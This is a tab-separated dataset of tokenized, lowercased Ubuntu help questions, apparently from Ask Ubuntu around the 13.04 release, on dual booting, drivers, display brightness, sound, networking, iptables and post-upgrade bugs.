286024	ubuntu not showing up in refit ( mac dual boot )	i 've been trying to get the dual boot to work for a few days now . i installed refit and then installed ubuntu , when installing i selected the option to put the grub loader on the ubuntu partition . after installing , i do n't see the ubuntu install in the refit loader , and i can not repair the partition table . i boot os x and get the output from the partition inspector , which is below . *** report for internal hard disk *** current gpt partition table : # start lba end lba type 1 409640 781659639 mac os x hfs+ 2 781660160 970772479 efi system ( fat ) 3 970772480 976772479 linux swap current mbr partition table : # a start lba end lba type 1 1 409639 ee efi protective 2 409640 781659639 af mac os x hfs+ 3 * 781660160 970772479 83 linux 4 970772480 976772479 82 linux swap / solaris mbr contents : boot code : none partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 1 , type mac os x hfs+ listed in mbr as partition 2 , type af mac os x hfs+ partition at lba 781660160 : boot code : none file system : ext4 listed in gpt as partition 2 , type efi system ( fat ) listed in mbr as partition 3 , type 83 linux , active partition at lba 970772480 : boot code : none file system : unknown listed in gpt as partition 3 , type linux swap listed in mbr as partition 4 , type 82 linux swap / solaris does anyone know how i can go about fixing this ?
286025	how do i install on an encrypted disk now that there is no alternate cd ?	how do i install raring in an encrypted disk ? there 's no alternate cd and on regular raring cd there is no option to mount the existing encrypted partitions !
286031	why is my broadband dongle not detected after upgrade to 13.04 ?	i got a strange problem ! my broadband dongle is not being detected on my dell 5220 laptop after i updated to ubuntu 13.04 . previously it was working fine in 12.10 .
286033	how to configure uefi booting on a macbook 8,2	i googled a while on this so let me give you the details , then the questions i have a macbook 8,2 15 '' with kubuntu quantal installed from the mac+amd64 desktop cd image . i removed every macos partition on install and created gpt-swap-ext4 ( / ) -ext4 ( /local ) . lspci | grep vga only shows an amd 6600 series card , so i guess i 'm need to configure efi-booting to be able switch to the low power intel card . i found a package called grub-efi-amd64 as well as this tutorial , the latter seems outdated as it suggest compiling grub 1.99 by hand which is also contained in the package i found . i would kindly ask for clearification on the following : can i just apt-get install grub-efi-amd64 or is there more to be done ( only kubuntu on the machine , so grub will do fine - does it still need to be `` blessed '' as per the tutorial ) . does the package work through it all or do i still have to go through steps 3-7 of the tutorial ? the gpt partition only has 4 mib . do i have to enlarge it ?
286035	how do i turn off avahi-daemon on boot ?	i just switched from windows 8 to ubuntu 13.04 . i installed ufw gui interface for the firewall . in the listening report it shows the something called dhclient and avahi-daemon running in a few ports . i google both , but could not find a clear answer on if i need them and if not how do i turn them off . the only things i use my home computer for is the internet ( midori browser ) , steam and arduino . any help would be appreciate .
286036	how to change password of user to very simple like 'w ' ?	it says at least 6 characters . i want to change to easy input . how to change password of user to very simple like one character 'w ' ? thanks
286038	card reader module throwing errors while installing rts_bpp	i am trying to install rts_bpp driver for my card reader in 13.04 from the following site . https : //bugs.launchpad.net/ubuntu/+source/udisks/+bug/971876 while executing sudo dpkg -i rts-bpp-dkms_1.1_all.deb , i am getting the following errors : please help . ( i am not an advanced user in linux and pretty new. ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # setting up rts-bpp-dkms ( 1.1 ) ... loading tarball for rts_bpp-1.1 loading /var/lib/dkms/rts_bpp/1.1/3.0.0-17-generic/x86_64 ... dkms : ldtarball completed . creating symlink /var/lib/dkms/rts_bpp/1.1/source - > /usr/src/rts_bpp-1.1 dkms : add completed . first installation : checking all kernels ... building only for 3.8.0-19-generic building for architecture i686 building initial module for 3.8.0-19-generic traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms_packages.py '' , line 22 , in < module > import apport importerror : no module named apport error ! bad return status for module build on kernel : 3.8.0-19-generic ( i686 ) consult /var/lib/dkms/rts_bpp/1.1/build/make.log for more information . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # thanks ,
286041	how to install ubuntu 12.04 from 9.04 ?	i have a netbook like new ( standart ) with ubuntu 9.04 and i 'd like to upgrade for 11 , 12 ... how can i do ?
286042	why ca n't i login to the gui via lxdm after upgrading to lubuntu 13.04 ?	when i boot to the login screen , i can put in my credentials but nothing happens after that . i left my laptop over night and it still did n't log in . the only thing i can do is hit ctrl , alt f2 to get a terminal and run startx which required me to install gnome shell ( ugh ) . if i run startlxde , i get an error saying that it ca n't connect to the display . edited : it seems the issue is with lxdm . lightdm allows me to login just fine .
286045	how to get sound working through hdmi with intel hd audio in ubuntu 13.04	hdmi output used to work fine on my samsung np300e5c laptop in ubuntu 12.04 . however , i did a reinstall with the new 13.04 release ( 64 bit ) , and now i do n't see the hdmi output as a choice in the sound settings . the aplay -l command returns the following : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vc analog [ alc269vc analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 this means that the device is found , but ca n't be used , as can be seen when i input speaker-test -c 2 -r 48000 -d hw:0,3 : speaker-test 1.0.25 playback device is hw:0,3 stream parameters are 48000hz , s16_le , 2 channels using 16 octaves of pink noise playback open error : -19 , no such device also , alsamixer does n't show sliders related to the hdmi output . what do ?
286056	how can i downgrade to an older version of nautilus ?	it looks like that nautilus have changed a lot since previous version , i hate the way it is on ubuntu 13.04 ( installed it yesterday ) first of all , a lot of features are gone , next , if i start typing sth , it will search for it which is soooo bad ! is there anyway to go back to previous version ? ( of course i was unable to fine a way . edit : looks like nemo file manager is a fork of nautilus 3.4 by linuxmint dev . they were not satisfied with nautilus 3.6 ( like me ) i guess that will do it ; )
286057	nepomuk is not indexing files	i 'm noticing the following problems : when i click on desktop search - > basic settings - > details , i get `` file indexing service is not running '' and the indexed files field reals `` calculating ... '' but never actually produces a number . when using krunner , home run , etc , if i type a filename on my computer , it does not show up . ( edit ) when i try to index something on the command line , this happens : $ touch foobar $ nepomukindexer foobar nepomukindexer ( 9660 ) /nepomuk ( strigi service ) : simpleindexerror : `` no such object path '/datamanagement ' '' nepomukindexer ( 9660 ) /nepomuk ( strigi service ) : `` no such object path '/datamanagement ' '' no such object path '/datamanagement' nepomuk , semantic desktop , file indexer , and email indexer are all enabled under basic settings . this is under kubuntu 13.04 , though it was also an issue under 12.10 with the kde 4.10 ppa . it appears that nepomuk simply is n't indexing files and is n't generally working , but i 'm not sure where to look for log files .
286060	iptables on ubuntu server does not open ports	does iptables need ufw to work ? i tried unsuccessfully open 4447 on my ubuntu server 12.10 using iptables . did : server : ~ # iptables -a input -p tcp -- dport 4447 -m state -- state new , established , related -j accept after that iptables -l : chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt:4447 state new , related , established chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination but nmap does not show me port 4447 : server : ~ # nmap -sv localhost starting nmap 6.00 ( http : //nmap.org ) at 2013-04-26 12:54 brt nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.00078s latency ) . not shown : 991 closed ports port state service version 22/tcp open ssh openssh 6.0p1 debian 3ubuntu1 ( protocol 2.0 ) 139/tcp open netbios-ssn samba smbd 3.x ( workgroup : workgroup ) 445/tcp open netbios-ssn samba smbd 3.x ( workgroup : workgroup ) 3306/tcp open mysql mysql 5.5.31-0ubuntu0.12.10.1 5432/tcp open postgresql postgresql db 8080/tcp open http apache httpd 2.2.22 ( ( ubuntu ) ) can someone helps me to fix it ? i did the same steps on another server ( centos 6 ) and it worked at a glance thanks in advance
286062	upgrade ubuntu 12.10 > > > ubuntu 13.04 black screen boot failed with nvidia geforce gt630 why ?	1 ) i downloaded the iso of ubuntu desktop 64bit . 2 ) i burned the iso . 3 ) i tried to start the installation of ubuntu 13.04 from dvd black screen black screen black screen 4 ) http : //www.ashwinraon.com/2012/08/how-to-solve-ubuntu-blank-screen-boot/ or http : //ubuntuguide.net/no-input-signal-and-boots-into-blank-screen-after-ubuntu-installation “press and hold down shift key from bios screen until see the grub menu . highlight the first entry , press “e” to edit it . navigate to words “quiet splash” , delete them and type “nomodeset” in their place ( without quotes ) . press ctrl + x to continue boot.” 5 ) i ran the installation but after rebooting > > > > black screen 6 ) “press and hold down shift key from bios screen until see the grub menu . highlight the first entry , press “e” to edit it . navigate to words “quiet splash” , delete them and type “nomodeset” in their place ( without quotes ) . press ctrl + x to continue boot.” 7 ) boot ok. ubuntu 13.04 started . 8 ) i installed drivers nvidia 313.30 certified with synaptic . 9 ) i created the file / etc/x11/xorg.conf for resolution 1980x1020 ( samsung syncmaster px2370 ) with ubuntu 12.04 & ubuntu 12.10 installation no boot problem no black screen . also directly upgrading ubuntu 12.10 ( sudo apt-get update sudo apt-get upgrade sudo update-manager -d ) i had the same problem someone can explain why all this is happening ? thank you !
286064	gcalcli throwing ssl errors in 13.04	i 'm using ubuntu 13.04 . i was using gcalcli ( from source ) previously on ubuntu 12.04 and it was working fine . but on 13.04 , it fails to authenticate google with an ssl error . it opens a new bowser window and when i click 'grant access ' it crashes with an ssl error . here is the error when trying to run gcalcli from terminal : created new window in existing browser session . traceback ( most recent call last ) : file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 2263 , in bowchickawowwow ( ) file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 2112 , in bowchickawowwow client_secret=flags.client_secret file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 460 , in init self._getcached ( ) file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 548 , in getcached callist = self._calservice ( ) .calendarlist ( ) .list ( ) .execute ( ) file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 501 , in _calservice http=self._googleauth ( ) ) file `` /home/saad/downloads/gcalcli-master/gcalcli '' , line 489 , in _googleauth storage ) file `` /usr/local/lib/python2.7/dist-packages/google_api_python_client-1.1-py2.7.egg/oauth2client/util.py '' , line 128 , in positional_wrapper return wrapped ( *args , **kwargs ) file `` /usr/local/lib/python2.7/dist-packages/google_api_python_client-1.1-py2.7.egg/oauth2client/tools.py '' , line 197 , in run credential = flow.step2_exchange ( code , http=http ) file `` /usr/local/lib/python2.7/dist-packages/google_api_python_client-1.1-py2.7.egg/oauth2client/util.py '' , line 128 , in positional_wrapper return wrapped ( *args , **kwargs ) file `` /usr/local/lib/python2.7/dist-packages/google_api_python_client-1.1-py2.7.egg/oauth2client/client.py '' , line 1283 , in step2_exchange headers=headers ) file `` /usr/local/lib/python2.7/dist-packages/httplib2-0.8-py2.7.egg/httplib2/_init__.py '' , line 1570 , in request ( response , content ) = self._request ( conn , authority , uri , request_uri , method , body , headers , redirections , cachekey ) file `` /usr/local/lib/python2.7/dist-packages/httplib2-0.8-py2.7.egg/httplib2/__init__.py '' , line 1317 , in request ( response , content ) = self._conn_request ( conn , request_uri , method , body , headers ) file `` /usr/local/lib/python2.7/dist-packages/httplib2-0.8-py2.7.egg/httplib2/_init__.py '' , line 1252 , in conn_request conn.connect ( ) file `` /usr/local/lib/python2.7/dist-packages/httplib2-0.8-py2.7.egg/httplib2/_init__.py '' , line 1021 , in connect self.disable_ssl_certificate_validation , self.ca_certs ) file `` /usr/local/lib/python2.7/dist-packages/httplib2-0.8-py2.7.egg/httplib2/__init__.py '' , line 80 , in ssl_wrap_socket cert_reqs=cert_reqs , ca_certs=ca_certs ) file `` /usr/lib/python2.7/ssl.py '' , line 440 , in wrap_socket ciphers=ciphers ) file `` /usr/lib/python2.7/ssl.py '' , line 198 , in __init_ ciphers ) ssl.sslerror : [ errno 185090050 ] _ssl.c:340 : error:0b084002 : x509 certificate routines : x509_load_cert_crl_file : system lib i posted the issue on the developer 's github page and i was suggested that this was an issue with my python installation in 13.04. what is happening ? update : i installed two python packages via easy_install as their repo version were non-existant/outdated : tweepy and google-api-python-client . could they have borked my python install ? ? ?
286067	upgrade from 12.10 to 13.04 , worth it ?	my 12.10 install works fine , even nvidia optimus . only thing i miss is multitouch on my touchpad ( alps pad ) . is it a risk to upgrade to 13.04 ? is it really worth it ?
286075	no satisfiable dependency for dependency libudev0	i installed ubuntu 13.04 64 bit unity desktop environment and did the routine os update . downloaded the 64 bit .deb file from google chrome website and tried installing it , which resulted to the following error . i am guessing that sudo apt-get install -f might work , but i am quite eager to get the cause of this error before trying it . any help would be appreciated .
286078	ca n't get bigger resolution then 1152x864 when running ubuntu 12.10 or 13.04 in hyper-v	i 'm running a fresh installed ubuntu under hyper-v on windows 8 . i ca n't select a resolution bigger then 1152x864 . xrandr in the ubuntu vm states the maximum is 1152x864 ( my local monitors are running at 1920x1050 and above so i would like a higher res . is there any way to run at a higher res ?
286079	rtl8188cu usb network adaptor on ubuntu 13.04	i have an rtl8188cu usb network adaptor . on ubuntu 12.10 i had to download rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 because the built-in rtl8192cu driver did not work on the 64bit system ( tested fine on 32bit ) . now i have upgraded to ubuntu 13.04 and of cause the switch from kernel 3.4 to 3.8 broke the compatibility with the driver source . and ( like i suspected ) , the 64bit issue with rtl8192cu has still not been resolved . since realtek has not yet provided a new driver source , i have no working network on my computer ( i use usb tethering from my mobile at the moment ) . i tried downloading the windows driver and set it up with ndiswrapper , but as soon as i activate the ndiswrapper module while having that driver installed , i get a kernel panic . since i can not be the only one using this usb adaptor , i wanted to see if someone else might have found a solution to get something working ? someone might even have a solution as to why the built-in 64bit driver does not work ?
286088	menu bar and launcher missing in ubuntu 13.04	i have upgraded ubuntu desktop from 12.10 to 13.04 since then i cant see the menu bar or launcher , but i am able to open the terminal using keyboard shortcut when i use the guest log in there is no such problem i am facing the problem only with administrator account i have tried this launcher and window menu bar missing after 12.04 upgrade but i count find the result can any one help me with this
286089	graphics problems after upgrade to 13.04	i 've just upgraded my ubuntu 12.10 to the new 13.04 release ( 32 bit ) . i have a p4 @ 3.04ghz , 2gb of ram and an amd radeon hd6670 . after installing the new release i 've restarted my computer and since then i 've got the amd unsupported hardware watermark . since i 've had some graphics issues ( pixels jumping around ) under 12.10 , i 've done the same thing as before , which has fixed the problem ( changed the graphic display driver from the ubuntu release to the proprietary one ) . so i 've done that again but , instead of leaving the proprietary one i 've changed it to the ubuntu driver ( which i thought would be newer ) . i 've restarted my computer and since then i ca n't see anything properly , just some random yellow bars flickering after the `` ready to login '' sound . i ca n't even login or anything . this release ( and the 12.10 after this one ) is working great in my other computers ( asus eee pc 1015pem and core i7 @ 3.5 - 64 bits ) . i 've just experienced such problems under the mentioned config . what can i do to fix this ?
286091	no networking on boot after upgrading kubuntu to 13.04	i upgraded kubuntu to 13.04 today . i 'm using an ethernet connection . on every boot , networking service is running and everything is configured properly , but it ca n't establish a connection . i have to sudo service networking restart on every startup . how can i fix this ? i could create a script to restart networking that runs at startup , but i 'd rather find a solution than a workaround . can you help me ? p.s . : i found out that sometimes it boots up normally , but there 's no log i found that includes different information when networking is `` frozen '' . when it is , though , my cpu reaches over 90 % for hp-systray ( hp-update ) is trying to look for updates but ca n't understand that network is unreachable .
286092	where is hadoop-ec2-env.sh in the hadoop packages ?	i 'm unable to locate the file hadoop-ec2-env.sh . i 've downloaded and intalled hadoop_1.0.4-1_x86_64.deb from http : //mirror.olnevhost.net/pub/apache/hadoop/common/stable/ this is the most recent stable version . i would like to run hadoop on ec2 . i 'm following a tutorial that says : edit all relevant variables in src/contrib/ec2/bin/hadoop-ec2-env.sh . where is hadoop-ec2-env.sh ?
286104	graphics problem after upgrade to 13.04	i upgraded from 12.10 to 13.04 , and am having graphics bugs . either the screen is blank with random colored pixels at the top of the screen or i get repeated patterns or colors . i reinstalled ( clean ) 12.10 , and then upgraded to 13.04 right after install . same issues . i did install intel graphics drivers from intel 's driver installation package on my original 12.10 install . setup : intel pentium g2020 ( ivy bridge ) , biostar h61 itx motherboard
286106	13.04 python gi._glib no attribute gerror	i have a python application that ran without problem on 12.10 , but on upgrading to 13.04 the application fails with the following error : except gi._glib.gerror , e : attributeerror : 'module ' object has no attribute 'gerror' is there a change in the python 2 gtk libraries associated with 13.04 ?
286108	failed to mount /boot/efi	i just downloaded the lastest version of ubuntu13.04 from the official website ( of course it is amd64 ) and my computer is the asus-a45v laptop.i used the universal usb installer to creater a boot usb disk for installing ubuntu.and first i tried to use the first default option to install it ( that means i let ubuntu to do all the things itself , and i have win7 installed on my hdd ) , and all the things seems runs very good.but , then when i reboot and try to start ubuntu.it told me that `` faild to mount /boot/efi , type s to skip it , or type m to fix it manually '' and then i check the /boot/efi folder , and find that there is nothing in it ! and then i tried to install it manually , but got the same result . whats the problem ? how can i fix it ? and whats more , boot-repair can only bring my win7 loader back in the grub list but the formal efi loader of win7 has been overwrited into grub by ubuntu . how can i restore it ?
286111	how do i get the brightness keys working on a samsung nc110 ?	i 'm using ubuntu 13.04 on my samsung nc110 notebook and the keys for the brightness are n't working . can someone help me ?
286112	bluetooth loses connection with mouse in 13.04	i just upgraded to 13.04 from 12.10 and now i 'm having trouble with my bluetooth mouse ( dell bt travel mouse ) . it used to work without probs in 12.10 . now i can add the mouse as a bluetooth device in ubuntu and it will work . but after a couple of minutes the pointer will stop moving . the bluetooth settings show the mouse as being connected but it just does n't work anymore . if i remove the device and then try to add it again it will not connect . all i can do is remove the device . reboot . then add it again . this makes it work for a couple of minutes again and then it will stop working . i do n't know what they changed in 13.04 but as i said it worked fine before . any ideas ? thanks a lot !
286113	does 13.04 have power/suspend issues with sandy bridge ?	i have an i5 sandy bridge laptop and currenty use 12.10 with linux 3.5 . i heard that the kernel 3.6 has some issues with sandy bridge , i. e. does not wake up from suspend , or run on 100 % cpu load after suspend . is the 3.8 kernel a problem with sandy bridge cpus ?
286116	ubuntu 12.04 changing permissions external hard drive from terminal	i am attempting to rescue files from a broken system via the root terminal of the recovery console . i have a seagate 2tb external hard drive . output of sudo fdisk -l : /dev/sdb1 is the device boot hpfs/ntfs/exfat is the system everytime i try to copy files to the hard drive via : sudo cp [ file ] /media/expansion\ drive i get : cp : can not create regular file `/media/expansion drive/ [ file ] ' : read only file system i have tried : sudo chmod -r 775 /media/expansion\ drive sudo chmod -r 777 /media/expansion\ drive and sudo chmod a+rwx -r /media/expansion\ drive and for each command , the output is : chmod : changing permissions of `/media/expasion drive ' : read-only file system so i 'm at a loss . i 've tried searching for more help , but the majority of solutions that i have found involve using nautilus of some other gui and i am unable to access those resources because i can only access from the recovery console root shell please help ! the crash seemed spontaneous and i was unable to back up my current project ... any help would be greatly appreciated .
286117	brightness not working on 13.04 upgrade on dell xps 13 ultrabook	just upgraded from 12.10 to 13.04 on dell xps13 ultrabook and the display is very dim and can not be changed using f'n keys or from system settings . this ultrabook uses intel 's ivybridge mobile . update : with the intention of reloading 12.04 i had to change the boot params to boot from usb stick . so : secure boot : disabled load legacy rom option : enabled boot list option : uefi uefi boot : must have not quite got params right since it booted from the ssd drive but this time display was normal and could up/down brightness ? so need to investigate this more by playing with boot params but have n't time or patience now . andrew
286118	is there any easy way to get the direct download link of all updates in ubuntu ?	when a long list of new updates are available , i prefer to use a download manager in another computer to download .deb files of updates . is there any easy way to get the direct download link of .deb files of all updates ( from an update manager ) in ubuntu 12.10 ?
286119	ubuntu 13.04 wont shut down ?	my 32 bit oem 1 gb ram wont shut down after i select 'shut down ' from the drop box on the right top corner . also , when i press the power button on the notebook nothing happens . help ? the machine shuts down / restarts properly when the command prompt is used , 'suspends ' then restarts after a few seconds : the output while in suspend contains a few errors ; `` device already exists '' , can not hot-add device '' , `` link training error '' , `` usb `1-3 device descriptor read 8 ( read 64 ) error '' , `` failed to check link status '' ... .there is additional code headings that can be referenced if need be . the option to restart also is missing from the contents of the right hand top corner drop box . the initial error i did get twice on startup was that the software center had to 'close unexpectedly ' .
286120	how to remove php 5.3.25-dev ?	i tried to remove php from ubuntu : sudo aptitude purge `dpkg -l | grep php| awk ' { print $ 2 } ' |tr `` \n '' `` `` ` but without results . when i run php -v in terminal i get php 5.3.25-dev how i can remove ? thanks
286121	how to install athena file-manager	how do i install athena file-manager , under 13.04 ( amd64 ) i tried to compile it , but i ran into several dependencies issue . i know it is possible , cause i saw a screen-shot at www.iloveubuntu.net which was clearly running 13.04
286124	should i install the .deb or .tar.gz ?	please pardon the elementary question . i 'm going through this tutorial . i would like to install hadoop on vm ubuntu 64 bit . i would like to know whether i should be downloading the .deb file or the tar.gz file from here ? what is the difference between these two types of files ? does ubuntu care which one ?
286125	troubles in raring ringtail	i upgrade ubuntu 12.10 to ubuntu 13.04 raring ringtail , in 12.10 skype , pidgin and compiz fusion icon works pretty good , but with raring ringtal , i cant open skype and put compiz fusion icon in the status bar , both do n't works , pidgin do n't show my contacts , i have uninstalled with synaptic remove all , and installed again with software center , but the problem cant be corrected . in software and updates ubuntu raring ringtail disable ppa check-boxes appears this message in parenthesis ( disabled in the update to raring ) i cant activate the box again what can i do ? thank you in advance for the correct solution
286128	12.04 system keeps on hanging on `` setting up gconf2	since the update today dpkg and apt are both broken , and when i try to use them it recommends running : sudo dpkg -configure -a which then starts configuring gconf2 ( 3.2.5-0ubuntu2 ) and just keeps on displaying this message without ever finishing it or giving any feedback at all . the same thing happens when i try to run the update manager .
286132	ubuntu 13.04 asus n56 keyboard brightness restarting	i 'm using ubuntu 13.04 on my asus n56 notebook . everything works perfect except keyboard brightness . every time my notebook starts with the keyboard backlit set to the max value . i 'd like to change it - keyboard backlit set default to disable . i 've tried add this line in etc/rc.local : echo 0 > /sys/class/leds/asus : :kbd_backlight/brightness unfortunately it does n't work . how can i fix it ?
286134	which 's better for wine ?	i have a little question : which version of ubuntu works better with wine ? the actual version ( 13.04 ) or lts ? ( 12.04 ) because i 'd like to play mta san andreas in linux and the most of people says i can , but i do n't know which version of ubuntu works better with wine . thats all , thanks .
286135	how to make a beowulf cluster with ubuntu 12.10 ?	i have a few pcs just laying around and want to put them to work . while in my research , i came across parallel computing and a few forms of it . the one that appealed to me was the beowulf cluster . however , all tutorials i found were outdated since ubuntu 8.04 . i wish to make a beowulf cluster with ubuntu 12.10. . . or at least something similar to a beowulf cluster . can anyone help ? .
286138	i have no sound on ubuntu 13.04	i upgraded ubuntu from 12.10 to 13.04 last night and now i have no sound . i have tried all the various options known to me ( not that many ) without success . i went to the small speaker icon at the top right of the screen & opened the sound settings . i have two options to choose from there , an analog output and a digital output . i tried both without success ( with the test option and by attempting to listen to youtube and trying various configurations ) . i also tried the pulse audio options and could n't get the sound to work there either . i opened alsa mixer via the terminal and ensured that the sound was n't muted . my sound card is nvdia and i am using their driver which worked fine with 12.10 . i have also noticed that the green sound bar goes up and down in the output page on pulse audio indicating that it is playing sound , but there 's nothing coming out of the speakers . i use a hp desktop pc and it is connected to my samsung tv via an hdmi lead and that also worked previously . i have checked to make sure the sound is n't muted on the pc and also on the tv and they are definitely not muted .
286139	how to change locale for wine only ?	( note this is a different question from this one ) this is the output of the `` locale '' command on my machine : lang=en_gb.utf-8 language= lc_ctype= '' en_gb.utf-8 '' lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_collate= '' en_gb.utf-8 '' lc_monetary=en_us.utf-8 lc_messages= '' en_gb.utf-8 '' lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 lc_all= i am happy with these settings and would like them to stay . but whenever i open a wine application , i would like it to open with pl_pl.utf8 locale . in the terminal i can do this by typing lc_all=pl_pl.utf8 wine myapp.exe is there a way to permanently change the default locale for wine only ?
286145	desktop background changes to dark gray in activities overview in gnome in 13.04	since 13.04 , in gnome , when in activities overview , background changes to dark gray . in 12.10 , desktop background would dim but the image would still be visible . is this a bug or a feature ? if it is to be expected , ok . but if it is not so , what do i need to do to get the previous behaviour back ? by the way , i am using ubuntu 13.04 with gnome shell that ships with it .
286152	after upgrading to ubuntu 13.04 , should i stick with nvidia 310 driver or should i change it to 313 driver ?	after upgrading to ubuntu 13.04 ( 64-bit edition ) , i checked the `` additional drivers '' configuration and i noticed a new 313 nvidia driver entry . as a steam user , i had previously changed from the open source driver to 310 nvidia driver . there is no `` recommended '' option and there is no `` help '' button to get more information , so what should i do ? thank you .
286155	change local directory while using ftp	when we connect to a ftp server , how can we change the our local directory witch we can get access to it 's files ? is there any command to do that ?
286161	brightness control in ubuntu 13.04-64bit not working in toshiba t110	i 'm new to this forum and thought i 'd try it out . so , much like every edition since about 11.10 brightness control does n't work `` out-of-the-box '' . i have a toshiba satellite t110-12p and although i 've managed to solve the problem in earlier editions , this time i can not . i have tried adding the `` acpi_backlight=vendor '' kernel parameter but unlike other times , it did not solve the problem . i found a somewhat complicated solution by running some commands but i 'd like to find a more comfortable one . do you have any suggestions ?
286164	upgrade from 12.10 to 13.04 affecting other systems	i 'm quite new to using ubuntu . i have a dual-booted computer , running windows 7 & ubuntu 12.10 . i 'm planning to get an upgrade to 13.04 . in terminal , i know the command is `` do-release-upgrade '' . but , when i install it , will it leave my other systems alone ? i 'm expecting it will just add the option to boot into ubuntu 13.04 when i turn on my computer ? so i would have the options : windows 7 , ubuntu 12.10 & ubuntu 13.04 correct ? all in my grub menu . help is greatly appreciated , i just really want to make sure nothing will be harmed . thanks in advance .
286167	iburst 13.04 not working	has anyone has managed to install the iburst usb drivers ? i went through the steps and when i want to start the connection i get the following error : plugin rp-pppoe.so loaded . /usr/sbin/pppd : in file /etc/ppp/peers/dsl-provider : unrecognized option ''
286170	ubuntu 13.04 amd/intel hybrid graphics is not working	the same problem again , now for the newest release 13.04 : on 12.10 my sony vaio vpcse with intel® hd graphics 3000 and amd radeon™ hd 6630m worked fine with the catalyst control center , installed as described here . but it is not working on ubuntu 13.04 with the instructions , i described in this entry .
286173	ubuntu on 13.04 hyper-v connection problem	i recently download the new disk of 13.04 of 32bit . i have hyper-v on windows 8 64bit . i try to operate 13.04 on hyper-v but i ca n't connect to the network . i have already set at hyper-v manager that will create my wifi connection to network . it work at windows 7 and 12.04 inside the hyper-v , so i know the setting i set for vm is right . how i can also operate network at 13.04 ? i try already with legacy and non legacy network . thanks for the help , tal . found an answer : just delete the bridge connection ( between your real nic and your virtual vethernt ( of hyper-v ) ) share internet connection like in the link below and it will work . http : //superuser.com/questions/489746/ubuntu-not-connecting-to-network-in-hyper-v
286175	how do you actually configure dhcp in maas in raring ?	all the docs say is if you are using maas to control dhcp , you need to set this via the web interface . but i see no mention of dhcp in the web interface . what exactly do you click on to configure dhcp ?
286177	how do i get the touchpad working on a toshiba p850 ?	the synaptics touchpad is not working after a fresh install of ubuntu 12.04.2 on a toshiba p850 . it works fine under windows 8 ( it 's a dual boot machine ) . it appears to be recognised ok in xorg.0.log i tried the proposed solution in the linked question : sudo modprobe -r psmouse & & sudo modprobe psmouse proto=imps ..but this does not work . this message gets logged to syslog but the touchpad is still unresponsive : apr 28 20:01:36 foobar kernel : [ 256.386831 ] input : ps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input17 edit this is not a duplicate of : synaptic touchpad on laptop not working i have read all related posts i can find but none of them offer a solution . the touchpad is detected but does not work . it works in windows 8 ( machine is dual boot ) $ egrep -i touchpad syslog may 18 20:44:35 node7 kernel : [ 10.787917 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 18 20:44:35 node7 kernel : [ 10.893065 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input10 may 19 09:24:36 node7 kernel : [ 11.728268 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 19 09:24:36 node7 kernel : [ 11.861941 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input12 may 19 09:36:21 node7 kernel : [ 11.646728 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 may 19 09:36:21 node7 kernel : [ 11.776112 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input11 in particular this does not work , it just causes compiz to crash and restart : $ sudo modprobe -r psmouse $ sudo modprobe psmouse proto=imps may 19 09:48:12 node7 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1101 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped may 19 09:48:42 node7 rsyslogd : last message repeated 2 times may 19 09:49:41 node7 gnome-session [ 2106 ] : warning : application 'compiz.desktop ' killed by signal may 19 09:49:41 node7 gnome-session [ 2106 ] : warning : app 'compiz.desktop ' respawning too quickly may 19 09:49:41 node7 gnome-session [ 2106 ] : critical : we failed , but the fail whale is dead . sorry ... . may 19 09:49:50 node7 anacron [ 1249 ] : job `cron.daily ' terminated may 19 09:49:50 node7 anacron [ 1249 ] : normal exit ( 1 job run ) may 19 09:50:09 node7 kernel : [ 844.392522 ] input : ps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input16 may 19 09:50:51 node7 kernel : [ 886.068210 ] type=1400 audit ( 1368953451.556:35 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1194 comm= '' cupsd '' pid=1194 comm= '' cupsd '' capability=36 capname= '' block_suspend ''
